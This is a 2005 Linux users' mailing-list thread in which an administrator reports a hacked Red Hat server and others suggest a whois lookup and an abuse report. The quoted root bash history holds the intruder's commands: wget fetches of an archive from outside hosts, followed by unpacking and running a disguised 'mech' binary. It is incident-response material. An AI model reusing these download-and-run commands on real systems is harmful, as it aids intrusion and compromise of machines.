[wellylug] Think I've had a server hacked
Cliff Pratt
enkidu at cliffp.com
Thu Oct 27 09:16:16 NZDT 2005
Good luck. It's Wanadoo, one of the biggest sources of SPAM
on my lists.
Cheers,
Cliff
Jamie Baddeley wrote:
> at the very least you should try this:
>
> % Information related to '82.123.175.0 - 82.123.175.255'
>
> inetnum: 82.123.175.0 - 82.123.175.255
> netname: IP2000-ADSL-BAS
> descr: BSTUI152 Tuileries Bloc2
> country: FR
> admin-c: WITR1-RIPE
> tech-c: WITR1-RIPE
> status: ASSIGNED PA
> remarks: for hacking, spamming or security problems send mail to
> remarks: postmaster at wanadoo.fr AND abuse at wanadoo.fr
> mnt-by: FT-BRX
> source: RIPE # Filtered
>
>
> send them mail. Yes, 82.123.175.245 may simply be a compromised jump
> point, but it costs nothing to let them know.
>
> jamie
>
>
>
> On Wed, 2005-10-26 at 10:25 +1300, Mark Signal wrote:
>
>>Hi
>>
>>I setup a box ages ago for a client - redhat 7.2/Mitel with only ssh port
>>open
>>
>>root password just got changed and /var/log/auth deleted
>>last login from 82.123.175.245 (somewhere in europe - normally only
>>connections from Lower Hutt :)
>>root bash history has..
>>w
>>passwd
>>uname -a
>>ps x
>>w
>>cd /var/tmp
>>ls
>>wget hash.idilis.ro/root.tar.gz
>>wget 217.156.85.3/root.tar.gz
>>fr hash.idilis.ro
>>ftp hash.idilis.ro
>>ftp 217.156.85.3
>>tar xzvf mech*
>>cd mech
>>mv bash init
>>PATH=:.PATH
>>init
>>init
>>init
>>
>>I am copying all the data off (including /var/logs/) and will
>>reinstall/update and shift ssh port
>>
>>is there anything else I can/should do?
>>
>>cheers
>>
>>
>>Mark
>>
>>
>>
>>
>>--
>>No virus found in this outgoing message.
>>Checked by AVG Free Edition.
>>Version: 7.1.361 / Virus Database: 267.12.5/147 - Release Date: 24/10/2005
>>
>
>
More information about the wellylug
mailing list